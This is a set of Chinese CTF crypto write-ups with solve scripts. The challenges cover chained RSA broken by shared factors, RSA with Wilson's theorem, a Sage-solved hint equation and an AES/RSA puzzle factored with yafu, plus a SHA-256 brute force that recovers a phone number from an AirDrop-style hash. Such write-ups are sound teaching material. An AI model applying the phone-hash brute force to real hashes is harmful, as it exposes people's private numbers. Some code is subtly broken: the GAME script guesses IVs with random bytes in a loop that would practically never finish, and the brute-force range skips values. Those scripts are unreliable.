复现

羊城杯 esay rsa

题目：

output:

65439077968397540989065489337415940784529269429684649365065378651353483030304843439003949649543376311871845618819107350646437252980144978447924976470943930075812834237368425374578215977641265884859875440799334807607478705932175148673160353577875890074101393042506714001617338265284910381849259298772642190619
86843235426823545017422014398916780909062053456790256392304973548517489132984667679637386416948409930796162377844525829968317585749956057149930523547463230147376192820753802868362225137830225967953826475779047454555958271846035526319036389127587352017149417549187850782892924691511398536178090031958365483499
57839320383142814687522363258949714784622321678585619281948174372461045134361003939684803510572969567182690634502610963365500727981041136988638273942465134797850643121827808482673619534240872593224537996099454035648829692386918230535360101064254854063175494150147494342652670585674593236663514793256521719547
52668168898129361356420333177679019946307853075463961068071790653159090226904625885080236174231665178538405547828768043706515464922611051221394704678558922339886480247663138702481349098077291584992082414494275463670330534613607852999291645500391111597009868188974671249118213040057429113174377610094956993269
79875848044631194160351918105738804229446748736206976033243436373010695259945613104837645712048695514204494137005015770637421510392760763371639480133851920449252506525423837434811693638210458851990502785655738042348115385964604080872180121543147063180945532713593712726527002909054818485584237993215139630243
73100501797447180147684637554796375398455002202770022931512541062214916136294604754404667725341796896161398464327153718845280194035978972665664657052946003418121755545770123205426883869361411412259838522099085901563107814985172942977520233320215882707710717870398128412272218474014381169303848087621856187879
89149546555397759430343098936690138982544367561661914051499112345535238108800665531588376806546499374457634397161670140520060064963391826220177798442707381640723248034061313974522233415815795656570220902974484865176728535660627712374835329967608728216749734529761431592345816592875807318876347151421393671763
66449107450661172442868032153863675098235855689218695279414435182923510356012957155941548483160873271040452368644926703812707864779900715051152673705082002761445847561495295455460041902473282731259268870375921215589157288622757488879539441498396276257589120302991242300378364101246448094955634459779361686643
79694880331320743031437708811856697413105291652061062223857313580221562305807771003185061831752133665835648647560103986928466217390444724672894866216636981793418219455653595717274553950715056120806463449033181486699963584346517910081706586345546292894426402568226579894766693070066214488743160957135286739213
70521001788476157145543175674209083194325853388116385624440232036679708917857095748070597575068955423165296665429648694541353249787337464272095260410717659726012806836884799476995758902361678737968193674368688353935424186389207123637734230550266810766585903134004322848985320790788169777840924595645463787189
51801430118171456966246071852561156183140136541960623661080056673664466785669585092926482194691254461430866302262960624015915371927788809661387318097968209364907625599562339722700041444342116899266802018340155635959614677597708758012024981583143521259152639480003228924151971208695043251548758407218187895663
87310111118839703578797261862424304499548882114635944516216618095145194843718635007052242072452831460162126955481326379219639313067967998826898344673513019946299427614605216960081461930080199023399060417820769438661351988322185620598552697590115678078498754112860310272842870106790357443602405008865116282919

task:

from flag import flag
from Crypto.Util.number import *

m = bytes_to_long(flag)
e = 65537
f = open("output.txt", "r")
a = f.readlines()
for i in a:
    n = int(i)
    c = pow(m, e, n)
    m = c
print 'c = %s' % (m)
f.close()

'''
c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
'''

题目很好理解，就是用连续加密，每次使用的n都不一样直到最后一个n，题解，去找所有n之间的最大公约数，再用逆过程；下面是我的代码，写的不好，谅解；

c=38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
with open("output.txt","r")as f:   #标明一下这里的n我倒过来了
    a=f.read().split("\n")
from gmpy2 import *
# for i in a:       #这里的注释的n是题目给的正序
#     for j in a:
#         if gcd(int(i),int(j))!=1:
#             print(gcd(int(i),int(j)))
#         else:
#             continue
e=65537
from Crypto.Util.number import *

p=7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897
for i in a :
    d=invert(e,(p-1)*(int(i)//p-1))
    m=pow(c,d,int(i))
    print(long_to_bytes(m))
    c=m

[2022网鼎杯] crypto091

题目描述：

小A鼓起勇气向女神索要电话号码，但女神一定要考考他。女神说她最近刚看了一篇发表于安全顶会USENIX Security 2021的论文，论文发现苹果AirDrop隔空投送功能的漏洞，该漏洞可以向陌生人泄露AirDrop发起者或接收者的电话号码和电子邮箱。小A经过一番努力，获得了女神手机在AirDrop时传输的手机号哈希值，但再往下就不会了，你能继续帮助他吗？小A只记得女神手机号是170号段首批放号的联通号码。 Hash：c22a563acc2a587afbfaaaa6d67bc6e628872b00bd7e998873881f7c6fdc62fc

flag格式：flag{13位电话号码（纯数字，含国家代码）}

根据题目描述的信息只需要知道后面的七位就可以，因为170号段首批放号的联通号码为1709，因为又要加上国家代码86，所以就是”861709“，只需要爆破后面七位；

爆破脚本:

a="c22a563acc2a587afbfaaaa6d67bc6e628872b00bd7e998873881f7c6fdc62fc"
from hashlib import *
for i in range(1000000,9999999):
    c=(str("861709")+str(i)).encode()
    b=sha256(c).hexdigest()
    if b in a:
        print(c)

[2022鹏城杯] babyrsa

题目：

from Crypto.Util.number import *
from libnum import s2n
from secret import flag
p = getPrime(1024)
q = getPrime(16)
n = p*q
m = s2n(flag)
for i in range(1,p-q ):
    m = m*i%n
e = 1049
print(pow(2,e,n))
print(pow(m,e,n))
#4513855932190587780512692251070948513905472536079140708186519998265613363916408288602023081671609336332823271976169443708346965729874135535872958782973382975364993581165018591335971709648749814573285241290480406050308656233944927823668976933579733318618949138978777831374262042028072274386196484449175052332019377
#3303523331971096467930886326777599963627226774247658707743111351666869650815726173155008595010291772118253071226982001526457616278548388482820628617705073304972902604395335278436888382882457685710065067829657299760804647364231959804889954665450340608878490911738748836150745677968305248021749608323124958372559270

题解：

此题考的就是位数的运算和威尔逊定理的使用(下面是我的手写的解题)

解题代码：

from gmpy2 import *
from Crypto.Util.number import *
c_2=4513855932190587780512692251070948513905472536079140708186519998265613363916408288602023081671609336332823271976169443708346965729874135535872958782973382975364993581165018591335971709648749814573285241290480406050308656233944927823668976933579733318618949138978777831374262042028072274386196484449175052332019377
c=3303523331971096467930886326777599963627226774247658707743111351666869650815726173155008595010291772118253071226982001526457616278548388482820628617705073304972902604395335278436888382882457685710065067829657299760804647364231959804889954665450340608878490911738748836150745677968305248021749608323124958372559270
# c_2=4513855932190587780512692251070948513905472536079140708186519998265613363916408288602023081671609336332823271976169443708346965729874135535872958782973382975364993581165018591335971709648749814573285241290480406050308656233944927823668976933579733318618949138978777831374262042028072274386196484449175052332019377
# print(c_2.bit_length())
for k in range(2**9,2**10):
    a=(2**1049-c_2)%k
    if a==0:
      print((2**1049-c_2)//k)
e=1049
n=5823713380800241798127161208605473167667967902620702068684472024119185247468416314089247879281733463161248890572390983305415645926810810670115987090805775496828975940219063783825457069902831333895859965086768216313079359826260701972093534555185595188238549423953860497190971290229918600826572984225793661171633741
q=34211
p=170229264879724117919007372149468684565431232721075153274808454126426741324966131188484635914814926870341378228417496808202497615585946352638507704855332363766887139815236730403246238633855524068161116748612090155595549964229654262432946553891601975628848891407847198187453488358420350203927771308228162321231
d=invert(e,(p-1)*(q-1))
m=pow(c,d,n)
for i in range(p-q,p):
    m = m*i % p
    print(long_to_bytes(-m%p))
# flag{7h3_73rr1b13_7h1ng_15_7h47_7h3_p457_c4n'7_b3_70rn_0u7_by_175_r0075}

[2022MapleCTF] brsaby

题目：

from Crypto.Util.number import getPrime, bytes_to_long
from secret import FLAG

msg = bytes_to_long(FLAG)
p = getPrime(512)
q = getPrime(512)
N = p*q
e = 0x10001
enc = pow(msg, e, N)
hint = p**4 - q**3

print(f"{N = }")
print(f"{e = }")
print(f"{enc = }")
print(f"{hint = }")


N = 134049493752540418773065530143076126635445393203564220282068096099004424462500237164471467694656029850418188898633676218589793310992660499303428013844428562884017060683631593831476483842609871002334562252352992475614866865974358629573630911411844296034168928705543095499675521713617474013653359243644060206273
e = 65537
enc = 110102068225857249266317472106969433365215711224747391469423595211113736904624336819727052620230568210114877696850912188601083627767033947343144894754967713943008865252845680364312307500261885582194931443807130970738278351511194280306132200450370953028936210150584164591049215506801271155664701637982648648103
hint = 20172108941900018394284473561352944005622395962339433571299361593905788672168045532232800087202397752219344139121724243795336720758440190310585711170413893436453612554118877290447992615675653923905848685604450760355869000618609981902108252359560311702189784994512308860998406787788757988995958832480986292341328962694760728098818022660328680140765730787944534645101122046301434298592063643437213380371824613660631584008711686240103416385845390125711005079231226631612790119628517438076962856020578250598417110996970171029663545716229258911304933901864735285384197017662727621049720992964441567484821110407612560423282

列方程，解未知数：

因为N=p*q
hint=p**4-q**3
p**4=hint+q**3
p**4=N**4//q**4
所以hint+q**3=N**4//q**4
所以hint*q**4+q**7=N**4

sagemath代码解p和q

N = 134049493752540418773065530143076126635445393203564220282068096099004424462500237164471467694656029850418188898633676218589793310992660499303428013844428562884017060683631593831476483842609871002334562252352992475614866865974358629573630911411844296034168928705543095499675521713617474013653359243644060206273
e = 65537
enc = 110102068225857249266317472106969433365215711224747391469423595211113736904624336819727052620230568210114877696850912188601083627767033947343144894754967713943008865252845680364312307500261885582194931443807130970738278351511194280306132200450370953028936210150584164591049215506801271155664701637982648648103
hint = 20172108941900018394284473561352944005622395962339433571299361593905788672168045532232800087202397752219344139121724243795336720758440190310585711170413893436453612554118877290447992615675653923905848685604450760355869000618609981902108252359560311702189784994512308860998406787788757988995958832480986292341328962694760728098818022660328680140765730787944534645101122046301434298592063643437213380371824613660631584008711686240103416385845390125711005079231226631612790119628517438076962856020578250598417110996970171029663545716229258911304933901864735285384197017662727621049720992964441567484821110407612560423282
x=var("x")
f=134049493752540418773065530143076126635445393203564220282068096099004424462500237164471467694656029850418188898633676218589793310992660499303428013844428562884017060683631593831476483842609871002334562252352992475614866865974358629573630911411844296034168928705543095499675521713617474013653359243644060206273**4-hint*x**4-x**7
q=int(f.roots()[0][0])
print(q)
p=N//q

接下来就迎刃而解；

GAME

下面是题目：

#!/usr/bin/python
#coding:utf-8

import gmpy2
import random
from flag import flag
from Crypto.Util.number import getPrime,long_to_bytes,bytes_to_long
from Crypto.Cipher import AES
from os import urandom

def getkey():
    p = getPrime(2048)
    k = random.randint(3, 10)
    r = random.randint(k, 2048)
    while True:
        e = random.randint(3, p**k*(p-1))
        if gmpy2.gcd(e, p**r*(p-1)) == 1:
        	break
    pubkey = (long(e), long(p**k))
    return pubkey

def c1pto(m, pubkey):
    e, n = pubkey
    print(hex(e))
    assert m < n - 1
    c = pow(m, e, n)
    print(hex(c))
    return n

def c2pto(p):
    key = urandom(16)
    iv = urandom(16)
    cipher = AES.new(key,AES.MODE_CBC,iv)
    m = iv + long_to_bytes(p)
    print(cipher.encrypt(m).encode("base64"))
    return key


m=bytes_to_long(urandom(64)+flag)
pubkey = getkey()
n = c1pto(m, pubkey)
key=c2pto(n)
print(bytes_to_long(key))


'''output
0x5b0cd450a7bfb679dc9caa8aa6fc131708fca2a34375d049ac035fb019463d9c3fa11adb0eb51dea1ae85223df59f887a12ab376cbcb272681c3872c57f4da27396052242b608e3ea4ff53061e63bbfdff652ce25f4ce73315fd1a73a5d5e7307402c7a3c6c1a80c63297b441125c38e23729da6473e5dc332e4e7201df25ff6c8b9918b262e56a31bebe13e093e6f4dba47a771961358cedf6d740732425cb708a633d538dcdc12ef7b49ce76aa270f50dd7cc1b879f1d7b19c6ac3b891fe4e20fb7645b7567237775881de7d30ba754d495ffe8ee751d1cfee1c661a2dbf13a53ff1bcf8085b39f6508fbf37137ebad659665fe5fcc67eef02970a44ac675e28103bd10f2045983d5adaa909b18b70a909b08b76c21b2798830276068d0ebd27303985bb5f3e681219a50bc761b7630587743768cf61922804d195e265aaaabb4740a2c5d7e8ff4e1c19cfb534d345f537e95e948591557f3136da617657e24d1904be373f5e7d63af330b837bcc662cbcd801eb436dbbeb714469d227e9f17e118db39eeb42e45455e6daf4d8fe0e19c4457b596c20e1ef8d235b230018a58e1c66c52c7317094aa5797f50a3b5ebe2be2abd1a04d907fbb68919956d7b0939ac0195a3f3bd3eb6f08eef67a895807768250172ec6bb2b35c9962de03df847170472b73981c04f2aef03721554c818ec9eb7f625d1a3fcdcf756adc4b6fd61950724ac2164a94df70f4aa1cc36c51dd2c3b6545c6c2233544254f6a24e6a170918fd0c533734ef859fed3c5d6f1f9acf8d3b77804c98fa5f1429763ebe860a77380a1e94626b46d88e5263855a0a0d226eb7ca64824c9a06acda851e650e6b035c04e27de61cd49ff49ac3ea3407440f9e76ce47c02301c1bc9c28befe0cd1f5b999961b055ffb39e2f451302aaedc5d779da03830bda1ed3ba9be4f23b2381096f3dc60c84a91ba0aa44242cc6aa361e2ecac867a2d1ef6868199ecb3004aa62bd56683c3476a9bd3f0316905e4f83ef5a907d9796231b9f506c82c09c739513a0db04467a071dcc34cb11bbba8cd3f1870174e04160ae74c2160a61a7c472e8edc51e969a2f0fb47cee59b67d401ecb13b06f72dcfb24f5850b8921b8bad14f7c6bd123c13b3a2ea1761fc425066ba107d61e96d2fa9b3ed88befec93578495ef4c7a1eb95d76679d1f5261f0202e1de881c5c5b1fb44f471a75a305d86df1123cd83c8bc9449c73cf34dbd247111c873bc1fc7948863bb59f2ac3d7129c2e7c3e0ef94afb38a01b3e42f83f42a5cc8e14cbe53c0c8d76768cdc98bef921aaca60204519b516d4c9de7cf581eec8a53faa2e2d96722d0ef2c23d5567ba48104890534cd84432565236cb3402504e0feb6c25426c52d2b2b42f10a007cdd38b540cf64a96ee784deb2b595deb4a9497f9a25ab06eab443010b66e7decc162dcbd7de12737d72a46ec0b8151e1ed42716af2c7602692d7c0ea757bc056c89d2640773a4c3c1a2297c87c13676e414003ff3af0d1abb87ba618e24a4dfe05c0b4443bda53d26c7e30f0dec498d9091074fe3444e81b9a4d8d7acc8b1e38f6afc63540a4e8880fd73bd34bc3563cc0a98bd35ce7455d5cf8a114bc2fe2fb9a58e725cc121e4e242fc0a9a8e38615bda67fd9f158e718154eb51d0ec3d941426933e36fba1db0d7b59d52be90aa796895e6a49fed0a7887b8d7c71a9aa023a8dc73391e3d1bfc746cde9f964d99625900624a8eb300f2d7d2f8703f470776088f27aaa72e7607dcd78cf63754cec00db23bb36beb48cffb20a06df884f101a9L
0x26c6b16ed40253ff31bdcd502d63230a9655f29599cfb41a29f10e700589e6a13a8c78f483e0aa8b9353fa258a1437ba15e8d2c8bb2b090a6887740b31d71550745611fabd087904f150b4d928d155a7fcdd1a64c7349ce984dfd08c4c795e93b409f53c1458e6de777dc5993198f4c0648381116fe5cbafa57499d9ce685c625df4797afc344e8fe4a0fc36cf82ba1423c8a4ad7a33bc4cbab25e2df729085f96d3d9d542d981fa46cac8a37ceb70b9f808213845c06b72be7e2d1224e4dc02817bd474c690e43f6d8f1916a20f2e078bfaa604343d695e6f5f88d9f11c43a886ff97d9bd26b0126af40bed8e03a43bf8c912b5b0dd2f9f2e7e99db066759f573cd59a40a554bebdd3e7e0adbc38fcb91adeb72f9dcd30558b082471a02fd9131a61cf29b1f4e38a5d689d8dcd0b8dc29075e3a33b2d6a25bee6ff9e20d269cc088a2b155be76a1531ce30b25edf928990b5143fc5ae2737d8d4070d0517f5137c458d7afed8f51e2c2973dd143235c9deaffe9ce8fbcd767a93573399dafd5ef61408c77302c993354a080684cdbfb7c1eeb6e6be907db790038c7ce62517815d16fe366bd26178f2f05b9e56450814f4ba7ab6cab54c5f78316b0451057785c03a77c20814eb405cd20e5bff5247a12500dd16173125ffdef4fb6317ab942d0d7e0e584a8fd97a8ba8d87fd38127d6d059902a2d48dafd10938ea5d108f3eb986aabf9e212151b0e540bb5fd25888143633be9982395d4d3bef5278be37328e0239569eb511698ef7f9e7e12aa204cb4c069ffcdeecb65f42ba37f7bfd47c4ba8df384a88adf3486b58cc1620185ac81dfb10f591fc82f3ae046341ebd1e8288f10500d6677e91b89729dfd299b74be13a9183725aacb0023f4fb01efda61390b0312d90ff6a9a319433681ad1811efe038fcdeb6dc1c3f594c4f8011aacfee74ea9638fccb3d669435a1208578c934277caa3ec74f9efbb33e024909b121e7b4e48ec94b762fa9dcab8a1c11b86bb9db164c7655504d304661e04e95b0b356f5968334596fb11df95bbdcb3a6618f431c864658827662f760fc86b2136221bd50472dc19c4f177eb5edf7978760dc15150cfda0a3ea649cb672b8f37229298c6edcc630e3ac9a5f43f58a93ba8def335472f7ebdedd7715a27c4ea622344a949bec59af030455ed61911d53388022bd502e800b769ef499f94f02c96f486b40ce68dbdc42e5690ac2992bedf7f0ba384504c32cb00a25d4e125483003152e81ebe9c12d928627d7f14fc3fbdf5141addc477d5ae4f32e64dcb58a6e2cf955ad7ae54e1665b3199bd0fae36b9ec56c09ac00efc9d27e69a93f4e08652edc3340fa2c518d388ee4a005b9c83956b9139b98380f6925a1a4c3e64ff8d96f2827d0d8a25cc72a2c03a28e33871284b46e10c85f2ad75969b1d84e9d88bb4e05dL
GuGfliJiRkNsUbbmB+g/q4U3z6YahJ6G1Q9bg6ZT/ilJnkNMICmQYMFuhlNBuVZHfJJIFwwFJ5FK
G+z9zSXalJq6quN6d3CSYSMHvYk04Orpn76Y2VQX5qQk72uCssd4x5KNIOmX0CvzJmjTWjLvL1U5
twQupfkuDr/axqyHFss3pJkj9o0IRZmtz87bi5WojeUjOaayQ0RNenJJzhJ+zFJwdUCpUhwotHxL
OPsUXYSoY7AKPwj53Dlsy0deNBKFN89BolC4pTwHWvn0M/8eu9kIze+5sQuKrk0VI5ASNzA6PRp1
owpgsxNuy18k6/y01+mVheQkFrH2IrFNgqe3+Gu/PXEDPi3G2nAIi/4Xf9QI0DNH+hkoN40zWaX3
OkEVQeLQ9o/KuggeoajYwDusFyQxOQZYFr5I+v8uBApcQz29bKIRiZX78r9YN3IaSsL0JgLPQPYa
NPNiZMm5pqmv/zV0poZikYGYJsAwfjLJ/CYQ/iLBhkhKZoE9VxYEae7Wga1jwpJb3h/lA3mbvQof
MTR6ivnSZHzUu3elxMFTgTi5adB4PsBdke0YRXlWP8/AoggBAN5OMw8n2LCASIhp7q/1iljNUuw/
40mBCt75jszo1eBBDAbP7/DjXL5hUHFgen6xjedcySq/H0ibyNGasyePs3e+igr78fHyvXyIYYPa
EtM4RjC3j3TXheRYRo9lObJgHUHSY0PgAgrqc1rECexNa+QCvzzapemNAEE9OT8YLOEkB6zzpSrZ
6k/NR9KffGnqplQlWAfXdDrf3SsOmWVJ3G6DvmpTCukQgVYn+DCv5LdSSUZo2hjxBHPv8C5zpZia
sPLDr+2CwUvccettO3wwrWQ1bPfRBZ7OSghvipbYI7awjt45tyxT5TopN7e3kud1s4bdm7da/KQD
DQ3pxylH7Kc2b8wWfptW2t9wEoqdjNezr24E+/c6kNIo9TmZ8mPigNBz/d7Sd5TzxhstmXoXscAv
FLpc7B/RhD5qwXWlYZwisemsTL6GVgBpaWI0zp4pk4DaQcT7FM17qddeHCiF5YD9g6TZBkYXnvke
5hW1JERYny3GjTNum8P3p9L3NHWpfAK2S90ChRwDb3nDy81B6b6K+YMNsJmmMjJhE/GbP6jMFE/2
cLIAsAT+Ssk/zNEJKXKe3gN4pQzBcDJksDxrlYJoYQE/rz1Ni7EpKiuuEUtODcGSCcRagh6t6cJV
yDh76DgxgjAvjATjPS6bdJ5PQWocTtjoMUvkMjbeEoWMuoe5cgsHl3HoYsLyxWwk1zn4BVSdjumi
D0o8juKUTFsFjN8yyNQyAA4KNRrhrIBdK8VTcsJC5JFjJnJiX1P6yrUWZPnH4YB3wIZwA5EkXjlg
tNrZghyWTMNoMs4GH6A=

301960965517874528560207857875230191048
'''

解题思路就是：

爆破iv，利用AES求出明文，再求n，用yafu分解n；

解题脚本：

from base64 import *
from gmpy2 import *
from os import urandom
from Crypto.Cipher import AES
from Crypto.Util.number import *

key=301960965517874528560207857875230191048
key=long_to_bytes(key)
m='GuGfliJiRkNsUbbmB+g/q4U3z6YahJ6G1Q9bg6ZT/ilJnkNMICmQYMFuhlNBuVZHfJJIFwwFJ5FKG+z9zSXalJq6quN6d3CSYSMHvYk04Orpn76Y2VQX5qQk72uCssd4x5KNIOmX0CvzJmjTWjLvL1U5twQupfkuDr/axqyHFss3pJkj9o0IRZmtz87bi5WojeUjOaayQ0RNenJJzhJ+zFJwdUCpUhwotHxLOPsUXYSoY7AKPwj53Dlsy0deNBKFN89BolC4pTwHWvn0M/8eu9kIze+5sQuKrk0VI5ASNzA6PRp1owpgsxNuy18k6/y01+mVheQkFrH2IrFNgqe3+Gu/PXEDPi3G2nAIi/4Xf9QI0DNH+hkoN40zWaX3OkEVQeLQ9o/KuggeoajYwDusFyQxOQZYFr5I+v8uBApcQz29bKIRiZX78r9YN3IaSsL0JgLPQPYaNPNiZMm5pqmv/zV0poZikYGYJsAwfjLJ/CYQ/iLBhkhKZoE9VxYEae7Wga1jwpJb3h/lA3mbvQofMTR6ivnSZHzUu3elxMFTgTi5adB4PsBdke0YRXlWP8/AoggBAN5OMw8n2LCASIhp7q/1iljNUuw/40mBCt75jszo1eBBDAbP7/DjXL5hUHFgen6xjedcySq/H0ibyNGasyePs3e+igr78fHyvXyIYYPaEtM4RjC3j3TXheRYRo9lObJgHUHSY0PgAgrqc1rECexNa+QCvzzapemNAEE9OT8YLOEkB6zzpSrZ6k/NR9KffGnqplQlWAfXdDrf3SsOmWVJ3G6DvmpTCukQgVYn+DCv5LdSSUZo2hjxBHPv8C5zpZiasPLDr+2CwUvccettO3wwrWQ1bPfRBZ7OSghvipbYI7awjt45tyxT5TopN7e3kud1s4bdm7da/KQDDQ3pxylH7Kc2b8wWfptW2t9wEoqdjNezr24E+/c6kNIo9TmZ8mPigNBz/d7Sd5TzxhstmXoXscAvFLpc7B/RhD5qwXWlYZwisemsTL6GVgBpaWI0zp4pk4DaQcT7FM17qddeHCiF5YD9g6TZBkYXnvke5hW1JERYny3GjTNum8P3p9L3NHWpfAK2S90ChRwDb3nDy81B6b6K+YMNsJmmMjJhE/GbP6jMFE/2cLIAsAT+Ssk/zNEJKXKe3gN4pQzBcDJksDxrlYJoYQE/rz1Ni7EpKiuuEUtODcGSCcRagh6t6cJVyDh76DgxgjAvjATjPS6bdJ5PQWocTtjoMUvkMjbeEoWMuoe5cgsHl3HoYsLyxWwk1zn4BVSdjumiD0o8juKUTFsFjN8yyNQyAA4KNRrhrIBdK8VTcsJC5JFjJnJiX1P6yrUWZPnH4YB3wIZwA5EkXjlgtNrZghyWTMNoMs4GH6A='
m=b64decode(m)
while 1:
    iv = urandom(16)
    cipher = AES.new(key,AES.MODE_CBC,iv)
    s=cipher.decrypt(m)
    if iv in s:
        print(iv)
        n=bytes_to_long(s.replace(iv,b''))
        print(n)
        break
e=0x5b0cd450a7bfb679dc9caa8aa6fc131708fca2a34375d049ac035fb019463d9c3fa11adb0eb51dea1ae85223df59f887a12ab376cbcb272681c3872c57f4da27396052242b608e3ea4ff53061e63bbfdff652ce25f4ce73315fd1a73a5d5e7307402c7a3c6c1a80c63297b441125c38e23729da6473e5dc332e4e7201df25ff6c8b9918b262e56a31bebe13e093e6f4dba47a771961358cedf6d740732425cb708a633d538dcdc12ef7b49ce76aa270f50dd7cc1b879f1d7b19c6ac3b891fe4e20fb7645b7567237775881de7d30ba754d495ffe8ee751d1cfee1c661a2dbf13a53ff1bcf8085b39f6508fbf37137ebad659665fe5fcc67eef02970a44ac675e28103bd10f2045983d5adaa909b18b70a909b08b76c21b2798830276068d0ebd27303985bb5f3e681219a50bc761b7630587743768cf61922804d195e265aaaabb4740a2c5d7e8ff4e1c19cfb534d345f537e95e948591557f3136da617657e24d1904be373f5e7d63af330b837bcc662cbcd801eb436dbbeb714469d227e9f17e118db39eeb42e45455e6daf4d8fe0e19c4457b596c20e1ef8d235b230018a58e1c66c52c7317094aa5797f50a3b5ebe2be2abd1a04d907fbb68919956d7b0939ac0195a3f3bd3eb6f08eef67a895807768250172ec6bb2b35c9962de03df847170472b73981c04f2aef03721554c818ec9eb7f625d1a3fcdcf756adc4b6fd61950724ac2164a94df70f4aa1cc36c51dd2c3b6545c6c2233544254f6a24e6a170918fd0c533734ef859fed3c5d6f1f9acf8d3b77804c98fa5f1429763ebe860a77380a1e94626b46d88e5263855a0a0d226eb7ca64824c9a06acda851e650e6b035c04e27de61cd49ff49ac3ea3407440f9e76ce47c02301c1bc9c28befe0cd1f5b999961b055ffb39e2f451302aaedc5d779da03830bda1ed3ba9be4f23b2381096f3dc60c84a91ba0aa44242cc6aa361e2ecac867a2d1ef6868199ecb3004aa62bd56683c3476a9bd3f0316905e4f83ef5a907d9796231b9f506c82c09c739513a0db04467a071dcc34cb11bbba8cd3f1870174e04160ae74c2160a61a7c472e8edc51e969a2f0fb47cee59b67d401ecb13b06f72dcfb24f5850b8921b8bad14f7c6bd123c13b3a2ea1761fc425066ba107d61e96d2fa9b3ed88befec93578495ef4c7a1eb95d76679d1f5261f0202e1de881c5c5b1fb44f471a75a305d86df1123cd83c8bc9449c73cf34dbd247111c873bc1fc7948863bb59f2ac3d7129c2e7c3e0ef94afb38a01b3e42f83f42a5cc8e14cbe53c0c8d76768cdc98bef921aaca60204519b516d4c9de7cf581eec8a53faa2e2d96722d0ef2c23d5567ba48104890534cd84432565236cb3402504e0feb6c25426c52d2b2b42f10a007cdd38b540cf64a96ee784deb2b595deb4a9497f9a25ab06eab443010b66e7decc162dcbd7de12737d72a46ec0b8151e1ed42716af2c7602692d7c0ea757bc056c89d2640773a4c3c1a2297c87c13676e414003ff3af0d1abb87ba618e24a4dfe05c0b4443bda53d26c7e30f0dec498d9091074fe3444e81b9a4d8d7acc8b1e38f6afc63540a4e8880fd73bd34bc3563cc0a98bd35ce7455d5cf8a114bc2fe2fb9a58e725cc121e4e242fc0a9a8e38615bda67fd9f158e718154eb51d0ec3d941426933e36fba1db0d7b59d52be90aa796895e6a49fed0a7887b8d7c71a9aa023a8dc73391e3d1bfc746cde9f964d99625900624a8eb300f2d7d2f8703f470776088f27aaa72e7607dcd78cf63754cec00db23bb36beb48cffb20a06df884f101a9
c=0x26c6b16ed40253ff31bdcd502d63230a9655f29599cfb41a29f10e700589e6a13a8c78f483e0aa8b9353fa258a1437ba15e8d2c8bb2b090a6887740b31d71550745611fabd087904f150b4d928d155a7fcdd1a64c7349ce984dfd08c4c795e93b409f53c1458e6de777dc5993198f4c0648381116fe5cbafa57499d9ce685c625df4797afc344e8fe4a0fc36cf82ba1423c8a4ad7a33bc4cbab25e2df729085f96d3d9d542d981fa46cac8a37ceb70b9f808213845c06b72be7e2d1224e4dc02817bd474c690e43f6d8f1916a20f2e078bfaa604343d695e6f5f88d9f11c43a886ff97d9bd26b0126af40bed8e03a43bf8c912b5b0dd2f9f2e7e99db066759f573cd59a40a554bebdd3e7e0adbc38fcb91adeb72f9dcd30558b082471a02fd9131a61cf29b1f4e38a5d689d8dcd0b8dc29075e3a33b2d6a25bee6ff9e20d269cc088a2b155be76a1531ce30b25edf928990b5143fc5ae2737d8d4070d0517f5137c458d7afed8f51e2c2973dd143235c9deaffe9ce8fbcd767a93573399dafd5ef61408c77302c993354a080684cdbfb7c1eeb6e6be907db790038c7ce62517815d16fe366bd26178f2f05b9e56450814f4ba7ab6cab54c5f78316b0451057785c03a77c20814eb405cd20e5bff5247a12500dd16173125ffdef4fb6317ab942d0d7e0e584a8fd97a8ba8d87fd38127d6d059902a2d48dafd10938ea5d108f3eb986aabf9e212151b0e540bb5fd25888143633be9982395d4d3bef5278be37328e0239569eb511698ef7f9e7e12aa204cb4c069ffcdeecb65f42ba37f7bfd47c4ba8df384a88adf3486b58cc1620185ac81dfb10f591fc82f3ae046341ebd1e8288f10500d6677e91b89729dfd299b74be13a9183725aacb0023f4fb01efda61390b0312d90ff6a9a319433681ad1811efe038fcdeb6dc1c3f594c4f8011aacfee74ea9638fccb3d669435a1208578c934277caa3ec74f9efbb33e024909b121e7b4e48ec94b762fa9dcab8a1c11b86bb9db164c7655504d304661e04e95b0b356f5968334596fb11df95bbdcb3a6618f431c864658827662f760fc86b2136221bd50472dc19c4f177eb5edf7978760dc15150cfda0a3ea649cb672b8f37229298c6edcc630e3ac9a5f43f58a93ba8def335472f7ebdedd7715a27c4ea622344a949bec59af030455ed61911d53388022bd502e800b769ef499f94f02c96f486b40ce68dbdc42e5690ac2992bedf7f0ba384504c32cb00a25d4e125483003152e81ebe9c12d928627d7f14fc3fbdf5141addc477d5ae4f32e64dcb58a6e2cf955ad7ae54e1665b3199bd0fae36b9ec56c09ac00efc9d27e69a93f4e08652edc3340fa2c518d388ee4a005b9c83956b9139b98380f6925a1a4c3e64ff8d96f2827d0d8a25cc72a2c03a28e33871284b46e10c85f2ad75969b1d84e9d88bb4e05d
#n解出来用yafu分解 命令yafu-x64 "factor(@)" -batchfile p.txt 将要分解的数放进去，记得换行

p=20935418603755826153357961486749000137883878122092541278485245382546346099923598569473814209357669395236788185259189925906627960621490996925200115559569329810746744675867738485473466021581185385430988547168263735484625716958718825113577345085361945421237478366338611831738408648424304228723729310335432168121087334054958276987167490905779911687736536416815227240962562460212183301435420718431023950641725670461044591993133883921646824589614644103106984493917214402278641218422432546374433956301830629567708335305598359150744372547912472684947785245810663217040977994966632748245272393755319650187559761562868158211001
n=192099659971585644585994265356151893462377034960456794411988891865292985043855003153008582523342780428794810302819600257505211543181857907106415116235678327109890992104863370288179222517757670217778339429390238355802091081769000348240713104001227465195009290503347809694648095737603288589286587488951249122808668565718081375241590144993161651582987613212486939491481151331461062699460189663231086086438368188327851901136662178362187582946879512941211019554239356512237609083714797677920647956302526035540976096625395045576074618882913271336136197136983455626303177930159461486947144900160609689255459511724884379858318269727855760842754096692298627624434916921714588784746851193083162412064551556945404206854303755771760752959780690233660596074620616291920828653736584021095005924141651891036415545086668712524203621422434855332350634434410255685899978575653707114060202874964589333127633649581915659487394392054766924938473585908627256425677898409670003835577877230695953230779772624257018952499735317822119685099669750110189929339815489604592011705747522509443099530871227359100112168474188213599742539558713508525377201675194485642343270883438486906530571528359024979260422106335